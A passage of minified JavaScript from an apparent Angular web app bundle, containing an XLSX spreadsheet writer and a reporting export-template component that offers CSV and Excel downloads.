O7({type:String,value:te.column,align:te.align},i||pCt)})];break}t=T.concat(t.map(function(te){return e.map(function(pe){return O7(O7({},pe),{},{value:pe.value(te)})})}))}return t.map(function(te,pe){return function cCt(t,a,e){var k,i=e.getStyle,n=e.getSharedString,r=e.customFont,c=e.dateFormat,d=e.usesSchema,T=a+1,q=t.map(function(Y,te){if(null==Y)return"";var ut,pe=Y.height,Re=WZ(Y),Fe=Y.type,Ne=Y.value,et=Y.format;if(function lCt(t){return null==t||""===t}(Ne)?Ne=null:void 0===Fe&&(d||(Fe=function dCt(t){switch(P7(t)){case"string":return String;case"number":return Number;case"boolean":return Boolean;default:if(t instanceof Date)return Date}}(Ne)),void 0===Fe&&(Fe=String,Ne=String(Ne))),et){if(Fe!==Date&&Fe!==Number&&"Formula"!==Fe)throw new Error('`format` can only be used on `Date`, `Number` or `"Formula"` cells')}else Fe===Date&&(et=c);return(et||r||Re)&&(ut=i(Re||{},{format:et})),pe&&(void 0===k||k<pe)&&(k=pe),tCt(T,te,Ne,Fe,ut,n)}).join("");return'<row r="'.concat(T,'"')+(k?' ht="'.concat(k,'" customHeight="1"'):"")+">"+q+"</row>"}(te,pe,{getStyle:n,getSharedString:r,customFont:c,dateFormat:d,usesSchema:void 0!==e})}).join("")}(pe.data,{schema:e,headerStyle:n,getStyle:r,getSharedString:c,customFont:d,dateFormat:T})).replace("{views}",function wCt(t){var a=t.stickyRowsCount,e=t.stickyColumnsCount;if(!a&&!e)return"";var i="";return i+="<sheetViews>",i+='<sheetView tabSelected="1" workbookViewId="0">',i+='<pane ySplit="'.concat(a||0,'" xSplit="').concat(e||0,'" topLeftCell="').concat(XT(e||0,(a||0)+1),'" activePane="bottomRight" state="frozen"/>'),(i+="</sheetView>")+"</sheetViews>"}({stickyRowsCount:q,stickyColumnsCount:Y})).replace("{columnsDescription}",function CCt(t){var a=t.schema,e=t.columns;if(a||e){var i=(a||e).map(gCt).join("");if(i)return"<cols>".concat(i,"</cols>")}return""}({schema:e,columns:i})).replace("{mergedCellsDescription}",function DCt(t){return 0===t.length?"":'<mergeCells count="'.concat(t.length,'">')+t.map(function(a){var e=function MCt(t,a){return function ECt(t){if(Array.isArray(t))return t}(t)||function TCt(t,a){var e=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=e){var c,d,i=[],n=!0,r=!1;try{for(e=e.call(t);!(n=(c=e.next()).done)&&(i.push(c.value),!a||i.length!==a);n=!0);}catch(T){r=!0,d=T}finally{try{!n&&null!=e.return&&e.return()}finally{if(r)throw d}}return i}}(t,a)||function ACt(t,a){if(t){if("string"==typeof t)return BZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return BZ(t,a)}}(t,a)||function vCt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}(a,2),i=e[0],n=e[1],r=XT(i[1],i[0]+1)+":"+XT(n[1],n[0]+1);return'<mergeCell ref="'.concat(r,'"/>')}).join("")+"</mergeCells>"}(Fe)).replace("{layout}",function xCt(t){var a=t.sheetId,e=t.orientation,i="";return e&&(i+="<pageMargins",i+=' left="'.concat(.7,'"'),i+=' right="'.concat(.7,'"'),i+=' top="'.concat(.75,'"'),i+=' bottom="'.concat(.75,'"'),i+=' header="'.concat(.3,'"'),i+=' footer="'.concat(.3,'"'),i+="/>"),e&&(i+="<pageSetup",i+=' paperSize="'.concat(9,'"'),i+=' orientation="'.concat(yf(e),'"'),i+=' r:id="rId'.concat(a,'"'),i+="/>"),i}({sheetId:te,orientation:k}))}function YT(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function kCt(t,a){if(t){if("string"==typeof t)return HZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return HZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function HZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function N7(t){if("#"!==t[0])throw new Error('Color "'.concat(t,'" must start with a "#"'));return"FF".concat(t.slice(1).toUpperCase())}function qZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function zCt(){var t=[],a={};return{getSharedStringsXml:function(){return function WCt(t){var a='<?xml version="1.0"?>';a+='<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">';for(var i,e=function NCt(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function LCt(t,a){if(t){if("string"==typeof t)return qZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return qZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}(t);!(i=e()).done;){var n=i.value,r=n.trim().length===n.length?"":' xml:space="preserve"';a+="<si><t".concat(r,">"),a+=OZ(n),a+="</t></si>"}return a+"</sst>"}(t)},getSharedString:function(i){var n=a[i];return void 0===n&&(n=String(t.length),a[i]=n,t.push(i)),n}}}var FCt=/[\[\]\/\\:*?]+/;function VCt(t){if(!t)throw new Error("Sheet name can't be empty");if(t.length>31)throw new Error('Sheet name "'.concat(t,"\" can't be longer than 31 characters"));if(FCt.test(t))throw new Error('Sheet name "'.concat(t,'" contains illegal characters: []/\\:*?'))}function GZ(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function BCt(t,a){if(t){if("string"==typeof t)return jZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return jZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function jZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}var UCt=["fileName"];function QZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function jCt(t,a){if(null==t)return{};var i,n,e=function QCt(t,a){if(null==t)return{};var n,r,e={},i=Object.keys(t);for(r=0;r<i.length;r++)!(a.indexOf(n=i[r])>=0)&&(e[n]=t[n]);return e}(t,a);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);for(n=0;n<r.length;n++)!(a.indexOf(i=r[n])>=0)&&(!Object.prototype.propertyIsEnumerable.call(t,i)||(e[i]=t[i]))}return e}function $Z(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.fileName,i=jCt(a,UCt);return $Ct(t,i).then(function(n){return e?yM.saveAs(n,e):n})}function $Ct(t,a){var e=a.sheet,i=a.sheets,n=a.schema,r=a.columns,c=a.headerStyle,d=a.fontFamily,T=a.fontSize,k=a.orientation,q=a.stickyRowsCount,Y=a.stickyColumnsCount,te=a.dateFormat,pe=new O2t;pe.file("_rels/.rels",'<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>'),pe.file("[Content_Types].xml",'<?xml version="1.0" ?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default ContentType="application/xml" Extension="xml"/><Default ContentType="application/vnd.openxmlformats-package.relationships+xml" Extension="rels"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml" PartName="/xl/worksheets/sheet1.xml"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml" PartName="/xl/workbook.xml"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml" PartName="/xl/sharedStrings.xml"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml" PartName="/xl/styles.xml"/></Types>');var Re=function HCt(t){var a=t.data,e=t.sheetName,i=t.sheetNames,n=t.schema,r=t.columns,c=t.headerStyle,d=t.fontFamily,T=t.fontSize,k=t.orientation,q=t.stickyRowsCount,Y=t.stickyColumnsCount,te=t.dateFormat,pe=zCt(),Re=pe.getSharedStringsXml,Fe=pe.getSharedString,Ne=function PCt(t){var a=t.fontFamily,e=t.fontSize,i=Boolean(a||e);void 0===a&&(a="Calibri"),void 0===e&&(e=12);var n=[],r={},c=[],d={},T=[],k={},q=[],Y={},te=[],pe={};function Re(Fe,Ne){var bn,et=Fe.fontFamily,ut=Fe.fontSize,Ze=Fe.fontWeight,yt=Fe.fontStyle,It=Fe.align,St=Fe.alignVertical,Nt=Fe.wrap,oi=Fe.color,Ai=Fe.backgroundColor,vi=Fe.borderColor,xi=Fe.borderStyle,Za=Fe.leftBorderColor,wa=Fe.leftBorderStyle,en=Fe.rightBorderColor,Vo=Fe.rightBorderStyle,Di=Fe.topBorderColor,Pi=Fe.topBorderStyle,Oi=Fe.bottomBorderColor,$i=Fe.bottomBorderStyle,Na=Ne.format,yn="".concat(et||"-",":").concat(ut||"-",":").concat(Ze||"-",":").concat(yt||"-",":").concat(oi||"-"),Kr=Ai||"-",to="".concat(Di||vi||"-",":").concat(Pi||xi||"-")+"/"+"".concat(en||vi||"-",":").concat(Vo||xi||"-")+"/"+"".concat(Oi||vi||"-",":").concat($i||xi||"-")+"/"+"".concat(Za||vi||"-",":").concat(wa||xi||"-"),ol="".concat(It||"-","/").concat(St||"-","/").concat(Na||"-","/").concat(Nt||"-","/").concat(yn,"/").concat(Kr,"/").concat(to),Nl=d[ol];if(void 0!==Nl)return Nl;Na&&void 0===(bn=r[Na])&&(bn=r[Na]=String(100+n.length),n.push(Na));var Li,Fa,Xr=i?0:void 0;return(et||ut||Ze||yt||oi)&&void 0===(Xr=k[yn])&&(Xr=k[yn]=String(T.length),T.push({custom:!0,size:ut||e,family:et||a,weight:Ze,style:yt,color:oi})),Ai&&void 0===(Li=Y[Kr])&&(Li=Y[Kr]=String(q.length),q.push({color:Ai})),(vi||xi||Za||wa||en||Vo||Di||Pi||Oi||$i)&&void 0===(Fa=pe[to])&&(Fa=pe[to]=String(te.length),te.push({left:{style:wa||xi,color:Za||vi},right:{style:Vo||xi,color:en||vi},top:{style:Pi||xi,color:Di||vi},bottom:{style:$i||xi,color:Oi||vi}})),c.push({fontId:Xr,fillId:Li,borderId:Fa,align:It,alignVertical:St,wrap:Nt,formatId:bn}),d[ol]=String(c.length-1)}return T.push({size:e,family:a,custom:i}),k["-:-"]=0,q.push({}),Y["-"]=0,te.push({left:{},right:{},top:{},bottom:{}}),pe["-:-/-:-/-:-/-:-"]=0,q.push({gray125:!0}),Re({},{}),{getStylesXml:function(){return function OCt(t){var a=t.formats,e=t.styles,i=t.fonts,n=t.fills,r=t.borders,c='<?xml version="1.0" ?>';if(c+='<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">',a.length>0){c+='<numFmts count="'.concat(a.length,'">');for(var d=0;d<a.length;d++)c+='<numFmt numFmtId="'.concat(100+d,'" formatCode="').concat(yf(a[d]),'"/>');c+="</numFmts>"}c+='<fonts count="'.concat(i.length,'">');for(var k,T=YT(i);!(k=T()).done;){var q=k.value,te=q.family,pe=q.color,Re=q.weight,Fe=q.style,Ne=q.custom;c+="<font>",c+='<sz val="'.concat(q.size,'"/>'),c+="<color ".concat(pe?'rgb="'+yf(N7(pe))+'"':'theme="1"',"/>"),c+='<name val="'.concat(yf(te),'"/>'),c+='<family val="2"/>',Ne||(c+='<scheme val="minor"/>'),"bold"===Re&&(c+="<b/>"),"italic"===Fe&&(c+="<i/>"),c+="</font>"}c+="</fonts>",c+='<fills count="'.concat(n.length,'">');for(var ut,et=YT(n);!(ut=et()).done;){var Ze=ut.value,yt=Ze.color,It=Ze.gray125;c+="<fill>",yt?(c+='<patternFill patternType="solid">',c+='<fgColor rgb="'.concat(yf(N7(yt)),'"/>'),c+='<bgColor indexed="64"/>',c+="</patternFill>"):c+=It?'<patternFill patternType="gray125"/>':'<patternFill patternType="none"/>',c+="</fill>"}c+="</fills>",c+='<borders count="'.concat(r.length,'">');for(var Nt,St=YT(r);!(Nt=St()).done;){var oi=Nt.value,vi=oi.right,xi=oi.top,Za=oi.bottom,wa=function(ol,Nl){var bn=Nl.style,Xr=Nl.color;Xr&&!bn&&(bn="thin");var Li=!!Xr;return"<".concat(ol)+(bn?' style="'.concat(yf(bn),'"'):"")+(Li?">":"/>")+(Xr?'<color rgb="'.concat(yf(N7(Xr)),'"/>'):"")+(Li?"</".concat(ol,">"):"")};c+="<border>",c+=wa("left",oi.left),c+=wa("right",vi),c+=wa("top",xi),c+=wa("bottom",Za),c+="<diagonal/>",c+="</border>"}c+="</borders>",c+='<cellXfs count="'.concat(e.length,'">');for(var Vo,en=YT(e);!(Vo=en()).done;){var Di=Vo.value,Pi=Di.fontId,Oi=Di.fillId,$i=Di.borderId,Na=Di.align,jn=Di.alignVertical,yn=Di.wrap,Kr=Di.formatId;c+="<xf "+[void 0!==Kr?'numFmtId="'.concat(Kr,'"'):void 0,void 0!==Kr?'applyNumberFormat="1"':void 0,void 0!==Pi?'fontId="'.concat(Pi,'"'):void 0,void 0!==Pi?'applyFont="1"':void 0,void 0!==Oi?'fillId="'.concat(Oi,'"'):void 0,void 0!==Oi?'applyFill="1"':void 0,void 0!==$i?'borderId="'.concat($i,'"'):void 0,void 0!==$i?'applyBorder="1"':void 0,Na||jn||yn?'applyAlignment="1"':void 0].filter(function(to){return to}).join(" ")+">"+(Na||jn||yn?"<alignment"+(Na?' horizontal="'.concat(yf(Na),'"'):"")+(jn?' vertical="'.concat(yf(jn),'"'):"")+(yn?' wrapText="1"':"")+"/>":"")+"</xf>"}return(c+="</cellXfs>")+"</styleSheet>"}({formats:n,styles:c,fonts:T,fills:q,borders:te})},getStyle:Re}}({fontFamily:d,fontSize:T}),et=Ne.getStylesXml,ut=Ne.getStyle;if(i&&r&&!Array.isArray(r[0]))throw new Error('In a "write multiple sheets" scenario, `columns` parameter must be an array of `columns` for each sheet.');i||(i=[e||"Sheet1"],a=[a],r&&(r=[r]),n&&(n=[n]));for(var yt,Ze=GZ(i);!(yt=Ze()).done;)VCt(yt.value);for(var St=[],Nt=0,oi=GZ(i);!oi().done;)St.push(RCt(a[Nt],{schema:n&&n[Nt],columns:r&&r[Nt],headerStyle:c,getStyle:ut,getSharedString:Fe,customFont:d||T,dateFormat:te,orientation:k,stickyRowsCount:q,stickyColumnsCount:Y,sheetId:Nt+1})),Nt++;return{sheets:i.map(function(xi,Za){return{id:Za+1,name:xi,data:St[Za]}}),getSharedStringsXml:Re,getStylesXml:et}}({data:t,sheetName:e,sheetNames:i,schema:n,columns:r,headerStyle:c,fontFamily:d,fontSize:T,orientation:k,stickyRowsCount:q,stickyColumnsCount:Y,dateFormat:te}),Fe=Re.sheets,Ne=Re.getSharedStringsXml,et=Re.getStylesXml,ut=pe.folder("xl");ut.file("_rels/workbook.xml.rels",function L2t(t){var a=t.sheets;return'<?xml version="1.0" ?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'+a.map(function(e){var i=e.id;return'<Relationship Id="rId'.concat(i,'" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet').concat(i,'.xml"/>')}).join("")+'<Relationship Id="rId'.concat(a.length+1,'" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/>')+'<Relationship Id="rId'.concat(a.length+2,'" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>')+"</Relationships>"}({sheets:Fe})),ut.file("workbook.xml",function N2t(t){return'<?xml version="1.0" encoding="UTF-8" standalone="yes"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><workbookPr/>'+(t.stickyRowsCount||t.stickyColumnsCount?"<bookViews><workbookView/></bookViews>":"")+"<sheets>"+t.sheets.map(function(n){var r=n.id;return'<sheet name="'.concat(n.name,'" sheetId="').concat(r,'" r:id="rId').concat(r,'"/>')}).join("")+"</sheets><definedNames/><calcPr/></workbook>"}({sheets:Fe,stickyRowsCount:q,stickyColumnsCount:Y})),ut.file("styles.xml",et()),ut.file("sharedStrings.xml",Ne());for(var yt,Ze=function qCt(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function GCt(t,a){if(t){if("string"==typeof t)return QZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return QZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}(Fe);!(yt=Ze()).done;){var It=yt.value,Nt=It.data;ut.file("worksheets/sheet".concat(It.id,".xml"),Nt)}return pe.generateAsync({type:"blob",mimeType:"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"})}function XCt(t,a){if(1&t&&(m(0,"mat-option",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetExportTypeName(e)))}}function YCt(t,a){if(1&t&&(m(0,"mat-option",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetExportFilterName(e)))}}function JCt(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",15),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",4),he("valueChange",function(n){return be(e),Me(B(2).template.ExportFilter=n)}),oe(7,"translate"),s(8,"\n      "),ne(9,YCt,3,4,"mat-option",5),s(10,"\n    "),u(),s(11,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"pages.reporting.exporttemplate.ExportFilter")),C(3),at("matTooltip",re(7,6,e.GetExportFilterName(e.template.ExportFilter))),V("value",e.template.ExportFilter),C(3),V("ngForOf",e.GetExportFilterValues())}}function ZCt(t,a){if(1&t){const e=Ye();m(0,"th"),s(1),oe(2,"translate"),m(3,"button",16),he("click",function(){const r=be(e).index;return Me(B(2).AddColumn(r))}),oe(4,"translate"),m(5,"mat-icon"),s(6,"add"),u()(),s(7,"\n        "),m(8,"button",16),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteColumn(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n      "),u()}if(2&t){const e=a.index;ri("border-color",B(2).theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),za("\n        ",re(2,6,"pages.reporting.exporttemplate.Column")," ",e," \n        "),C(2),at("matTooltip",re(4,8,"general.Add")),C(5),at("matTooltip",re(9,10,"general.Delete"))}}function eyt(t,a){if(1&t){const e=Ye();m(0,"td")(1,"input",17),he("ngModelChange",function(n){return Me(be(e).$implicit.name=n)}),u()()}if(2&t){const e=a.$implicit;ri("border-color",B(2).theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),V("ngModel",e.name)}}function tyt(t,a){if(1&t&&(m(0,"option",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B().$implicit,n=B(3);V("value",i+"."+e),C(1),ke(re(2,2,n.GetExportPropertyName(e)))}}function iyt(t,a){if(1&t&&(m(0,"optgroup",21),oe(1,"translate"),s(2,"\n            "),ne(3,tyt,3,4,"option",5),s(4,"\n          "),u()),2&t){const e=a.$implicit,i=B(3);at("label",re(1,2,i.GetExportClassName(e))),C(3),V("ngForOf",i.GetExportProperties(e))}}function ayt(t,a){if(1&t){const e=Ye();m(0,"td"),s(1,"\n        "),m(2,"select",18),he("ngModelChange",function(n){return Me(be(e).$implicit.value=n)})("change",function(n){const c=be(e).index;return Me(B(2).OnCellChanged(n,c))}),s(3,"\n          "),m(4,"option",19),s(5),oe(6,"translate"),u(),s(7,"\n          "),ne(8,iyt,5,4,"optgroup",20),s(9,"\n        "),u(),s(10,"\n      "),u()}if(2&t){const e=a.$implicit,i=B(2);ri("border-color",i.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),V("ngModel",e.value),C(3),ke(re(6,5,"properties.selectNone")),C(3),V("ngForOf",i.GetAvailableClasses())}}function nyt(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",22),s(1,"\n      "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n      "),m(6,"input",23),he("keyup",function(n){return be(e),Me(B(2).ApplyFilter(n))}),u(),s(7,"\n    "),u()}2&t&&(C(3),ke(re(4,1,"pages.reporting.exporttemplate.filter")))}function oyt(t,a){if(1&t&&(m(0,"th",31),s(1),u()),2&t){const e=B().$implicit;C(1),ct("\n            ",e.name,"\n          ")}}function ryt(t,a){if(1&t&&(m(0,"td",32),s(1),u()),2&t){const e=a.$implicit,i=B().index;C(1),ct("\n            ",e[i],"\n          ")}}function syt(t,a){if(1&t&&(bt(0,28),s(1,"\n          "),ne(2,oyt,2,1,"th",29),s(3,"\n          "),ne(4,ryt,2,1,"td",30),s(5,"\n        "),Mt()),2&t){const e=a.index;V("matColumnDef",B(3).ToString(e))}}function cyt(t,a){1&t&&it(0,"tr",33)}function lyt(t,a){1&t&&it(0,"tr",34)}function dyt(t,a){if(1&t&&(m(0,"table",24),s(1,"\n        "),ne(2,syt,6,1,"ng-container",25),s(3,"\n      \n        "),ne(4,cyt,1,0,"tr",26),s(5,"\n        "),ne(6,lyt,1,0,"tr",27),s(7,"\n      "),u()),2&t){const e=B(2);V("dataSource",e.dataRows),C(2),V("ngForOf",e.displayedTemplate),C(2),V("matHeaderRowDef",e.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",e.displayedColumns)}}function myt(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",3),he("ngModelChange",function(n){return be(e),Me(B().template.Name=n)}),u(),s(9,"\n  "),u(),s(10,"\n  "),it(11,"br"),s(12,"\n  "),m(13,"mat-form-field",2),s(14,"\n    "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n    "),m(19,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().template.ExportType=n)}),oe(20,"translate"),s(21,"\n      "),ne(22,XCt,3,4,"mat-option",5),s(23,"\n    "),u(),s(24,"\n  "),u(),s(25,"\n  "),ne(26,JCt,12,8,"mat-form-field",6),s(27,"\n  "),it(28,"br"),s(29,"\n  "),m(30,"table"),s(31,"\n    "),m(32,"tr"),s(33,"\n      "),it(34,"th"),s(35,"\n      "),ne(36,ZCt,13,12,"th",7),s(37,"\n    "),u(),s(38,"\n    "),m(39,"tr"),s(40,"\n      "),m(41,"td"),s(42),oe(43,"translate"),u(),s(44,"\n      "),ne(45,eyt,2,3,"td",7),s(46,"\n    "),u(),s(47,"\n    "),m(48,"tr"),s(49,"\n      "),m(50,"td"),s(51),oe(52,"translate"),u(),s(53,"\n      "),ne(54,ayt,11,7,"td",7),s(55,"\n    "),u(),s(56,"\n  "),u(),s(57,"\n\n  "),m(58,"div",8),s(59,"\n    "),m(60,"button",9),he("click",function(){return be(e),Me(B().GeneratePreview())}),s(61),oe(62,"translate"),u(),s(63,"\n    "),m(64,"button",10),he("click",function(){return be(e),Me(B().SaveCSV())}),s(65),oe(66,"translate"),u(),s(67,"\n    "),m(68,"button",10),he("click",function(){return be(e),Me(B().SaveExcel())}),s(69),oe(70,"translate"),u(),s(71,"\n    "),it(72,"br"),s(73,"\n    "),ne(74,nyt,8,3,"mat-form-field",11),s(75,"\n    "),it(76,"br"),s(77,"\n    "),m(78,"div",12),s(79,"\n      "),ne(80,dyt,8,5,"table",13),s(81,"\n    "),u(),s(82,"\n  "),u(),s(83,"\n"),u()}if(2&t){const e=B();Ct("disable",!e.canEdit),C(5),ke(re(6,36,"properties.Name")),C(3),at("matTooltip",e.template.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.template.Name),C(8),ke(re(17,38,"pages.reporting.exporttemplate.ExportType")),C(3),at("matTooltip",re(20,40,e.GetExportTypeName(e.template.ExportType))),V("value",e.template.ExportType),C(3),V("ngForOf",e.GetExportTypeValues()),C(4),V("ngIf",e.template.HasExportFilter),C(4),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),V("ngForOf",e.template.Template),C(3),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),ke(re(43,42,"pages.reporting.exporttemplate.Header")),C(3),V("ngForOf",e.template.Template),C(5),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),ke(re(52,44,"pages.reporting.exporttemplate.Rows")),C(3),V("ngForOf",e.template.Template),C(6),V("disabled",!e.canGenerate),C(1),ke(re(62,46,"pages.reporting.exporttemplate.Preview")),C(3),V("disabled",!e.canDownload),C(1),ke(re(66,48,"pages.reporting.exporttemplate.DownloadCSV")),C(3),V("disabled",!e.canDownload),C(1),ke(re(70,50,"pages.reporting.exporttemplate.DownloadExcel")),C(5),V("ngIf",e.dataRows),C(6),V("ngIf",e.dataRows)}}let uyt=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.translate=n,this.canEdit=!0,this.dataRows=null}get template(){return this._template}set template(e){this._template=e,e&&(!e.Template||e.Template.length<=1)&&(e.Template=[{name:"",value:null},{name:"",value:null}]),this.dataRows=null}get canGenerate(){return this.template.Template.some(e=>null!=e.value)}get canDownload(){return null!=this.dataRows}get displayedColumns(){return[...Array(this.template.Template.filter(e=>e.value).length).keys()].map(e=>e.toString())}get displayedTemplate(){return this.template.Template.filter(e=>e.value)}ngOnInit(){}GeneratePreview(){this.dataRows=new zd(this.template.GetRowData(this.translate)),setTimeout(()=>{this.dataRows.sort=this.sort})}SaveCSV(){const e=[];e.push(this.template.Template.map(c=>c.name)),e.push(...this.dataRows.sortData(this.dataRows.filteredData,this.dataRows.sort));let i="",n=",";"de"==this.translate.currentLang&&(n=";"),e.forEach(c=>{i+=c.map(d=>'"'+d+'"').join(n)+"\n"});const r=new Blob([i]);(0,yM.saveAs)(r,this.dataService.Project.Name.replace(".ttmp",".csv"),{type:"text/plain;charset=utf-8"})}SaveExcel(){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){const e=[],i=[];this.template.Template.map(n=>n.name).forEach(n=>i.push({value:n,fontWeight:"bold"})),e.push(i),this.dataRows.sortData(this.dataRows.filteredData,this.dataRows.sort).forEach(n=>{const r=[];n.forEach(c=>r.push({value:c})),e.push(r)}),yield $Z([e],{fileName:this.dataService.Project.Name.replace(".ttmp",".xlsx"),sheets:[this.template.Name]})})}OnCellChanged(e,i){const 